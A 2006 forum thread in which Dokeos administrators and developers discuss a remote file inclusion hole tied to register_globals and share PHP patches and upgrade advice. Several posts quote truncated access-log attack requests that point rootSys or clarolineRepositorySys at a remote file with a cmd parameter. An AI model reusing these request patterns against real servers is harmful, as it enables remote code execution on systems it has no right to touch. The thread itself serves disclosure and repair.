View previous topic :: View next topic |
Author |
Message |
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Wed Apr 05, 2006 6:45 pm Post subject: [Fixed Dokeos 1.6.4] is it a security problem ? |
|
|
Is there a known security vulnerability with
/claroline/exercice/testheaderpage.php?rootSys ?
My server has been kacked using this URL
/claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c etc.
on Dokeos 1.6.2
Thank you for your help. |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Wed Apr 05, 2006 7:21 pm Post subject: |
|
|
This is indeed a security hole. You can expect a new dokeos version tomorrow.
If you want to fix this already you have to do the following:
- open inc/claro_init_global.inc.php
- find the 4 occurrences of
if(!isset($_SESSION[$key]) && $key != 'includePath')
- replace these 4 occurrences into
if(!isset($_SESSION[$key]) && $key != 'includePath' && $key
!= 'rootSys' && $key!= 'clarolineRepositorySys' && $key!= 'lang_path' &&
$key!= 'extAuthSource' && $key!= 'thisAuthSource' && $key!=
'main_configuration_file_path' && $key!= 'phpDigIncCn' && $key!= 'drs') _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Wed Apr 05, 2006 7:31 pm Post subject: |
|
|
thank you very much |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Wed Apr 05, 2006 7:36 pm Post subject: |
|
|
an alternative solution (but equally good and maybe easier to implement) (although I prefer the first solution)
add somewhere on the top of the page of claro_init_global.inc.php (solution by Olivier and René)
foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
} _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
domifreitas
Joined: 18 Oct 2004 Posts: 650 Location: Portugal
|
Posted: Thu Apr 06, 2006 9:18 am Post subject: |
|
|
Should we do the same upgrade for Dokeos community release 2.0.2? |
|
| |
Back to top |
|
|
turboke
Joined: 21 Feb 2005 Posts: 851 Location: Hogeschool Gent, Belgium
|
Posted: Thu Apr 06, 2006 10:46 am Post subject: |
|
|
domifreitas wrote: | Should we do the same upgrade for Dokeos community release 2.0.2? |
You should. The patch will be included in CR 2.0.3 (see this post). |
|
| |
Back to top |
|
|
roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
|
Posted: Thu Apr 06, 2006 11:43 am Post subject: |
|
|
turboke wrote: | domifreitas wrote: | Should we do the same upgrade for Dokeos community release 2.0.2? |
You should. The patch will be included in CR 2.0.3 (see this post). |
Community release 2.0.3 with the security fix is ready now.
Update: more security fixes available in the new community release 2.0.4. _________________ Free software for freedom!
Last edited by roan on Thu Apr 13, 2006 10:53 am; edited 1 time in total |
|
| |
Back to top |
|
|
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Thu Apr 06, 2006 2:48 pm Post subject: |
|
|
pcool wrote: | This is indeed a security hole. You can expect a new dokeos version tomorrow.
If you want to fix this already you have to do the following:
- open inc/claro_init_global.inc.php
- find the 4 occurrences of
if(!isset($_SESSION[$key]) && $key != 'includePath')
- replace these 4 occurrences into
if(!isset($_SESSION[$key]) && $key != 'includePath' && $key
!= 'rootSys' && $key!= 'clarolineRepositorySys' && $key!= 'lang_path' &&
$key!= 'extAuthSource' && $key!= 'thisAuthSource' && $key!=
'main_configuration_file_path' && $key!= 'phpDigIncCn' && $key!= 'drs') |
Are you sure this is enof ? I applied this code yesterday, like this. But my server is hacked for the second time today, in the same way :
[06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&cmd=cd...
etc. |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Thu Apr 06, 2006 2:54 pm Post subject: |
|
|
can you post your claro_init_global.inc.php here so that we can verify if you applied the fix correctly. _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Thu Apr 06, 2006 3:07 pm Post subject: |
|
|
here it is :
Last edited by vianney on Thu Apr 06, 2006 3:45 pm; edited 1 time in total |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Thu Apr 06, 2006 3:45 pm Post subject: |
|
|
your server probably has register_globals=on in php.ini
These should be set to off
You can also use the second approach in this case. Add to the top of claro_init_global.inc.php:
foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
} _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Thu Apr 06, 2006 5:31 pm Post subject: |
|
|
I will try.
Actually, register_global is on.
Do "off" should or must be used for Dokeos ? I thought it was "should".
Actualy the 3rd hack, they like me :-(
it is quite different :
[06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.mptechno.cz/cse.gif?&c
etc
Is the new code OK for that too ? |
|
| |
Back to top |
|
|
Tripple
Joined: 29 Nov 2004 Posts: 395
|
Posted: Thu Apr 06, 2006 7:51 pm Post subject: |
|
|
I added the fix on my Dokeos 1.6.1 installation.
How do I know if I was hacked? Do I have to search my logfile for 'rootSys'? |
|
| |
Back to top |
|
|
roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
|
Posted: Thu Apr 06, 2006 9:57 pm Post subject: |
|
|
vianney wrote: | I will try.
Actually, register_global is on.
Do "off" should or must be used for Dokeos ? I thought it was "should".
|
Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk. _________________ Free software for freedom! |
|
| |
Back to top |
|
|
Tripple
Joined: 29 Nov 2004 Posts: 395
|
Posted: Thu Apr 06, 2006 10:03 pm Post subject: |
|
|
roan wrote: |
Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk. |
Does Dokeos 1.6.1 works with globals off? |
|
| |
Back to top |
|
|
roan
Joined: 11 Dec 2002 Posts: 2543 Location: Free University of Brussels, Belgium
|
Posted: Thu Apr 06, 2006 10:17 pm Post subject: |
|
|
Tripple wrote: | roan wrote: |
Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk. |
Does Dokeos 1.6.1 works with globals off? |
Yes, from Dokeos 1.6.0 and community release 2.0 upwards Dokeos works with register_globals off. I can't remember about Dokeos 1.5.x but those users should upgrade anyway ;-)
However we performed a small trick to make this happen, which caused this security problem. In the next major releases (community release 2.1 and plain Dokeos 1.8) this trick is going to be removed to make Dokeos more secure. _________________ Free software for freedom! |
|
| |
Back to top |
|
|
vianney
Joined: 09 Feb 2006 Posts: 13
|
Posted: Fri Apr 07, 2006 7:35 am Post subject: |
|
|
roan wrote: |
Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk. |
in the INSTALL file it is said that :
Quote: | Past Dokeos versions required register_globals to be set to On. This is no
longer necessary, this can be set to Off and Dokeos will work fine. |
But as I can see with my experience it can't be used with register_globals "On" because there is a major security hole when it is used in production this way.
Dokeos should tell it clearly.
Secondly, I can tell you that the two possibilities of code you proposed against the hole presented in this post are inactives when register_globals is On. |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Fri Apr 07, 2006 8:15 am Post subject: |
|
|
When register globals is set to on then the only hole that still exists is in resourcelinker.inc.php.
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
I noticed today that not all my fixes made it to the CVS (I have lost all my icons on my windows box so I could not see if the files were changed or not)
What I advise you is
1. set registerglobals to OFF
2. take the dokeos1.6.4 ZIP package and use this one to update your campus. _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
frmartens
Joined: 20 Sep 2004 Posts: 441 Location: Ghent Arteveldehogeschool
|
Posted: Fri Apr 07, 2006 8:23 am Post subject: |
|
|
pcool wrote: |
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
|
Is this possible? Both files should be created on the same CVS tag.
I'm also wondering : is the zip file only intended to be installed on a windows server or is it just another means of packaging it ? _________________ Frederik Martens - Project Digitaal Leren - Arteveldehogeschool |
|
| |
Back to top |
|
|
pcool
Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University
|
Posted: Fri Apr 07, 2006 9:03 am Post subject: |
|
|
It's just a mean of packaging.
I manually added the corrected files to the zip file but couldn't do this for the tar.gz _________________ Patrick Cool, ICT&O, Ghent University (UGent)
Minerva - home of more than 30.000 active Dokeos users
http://icto.ugent.be |
|
| |
Back to top |
|
|
|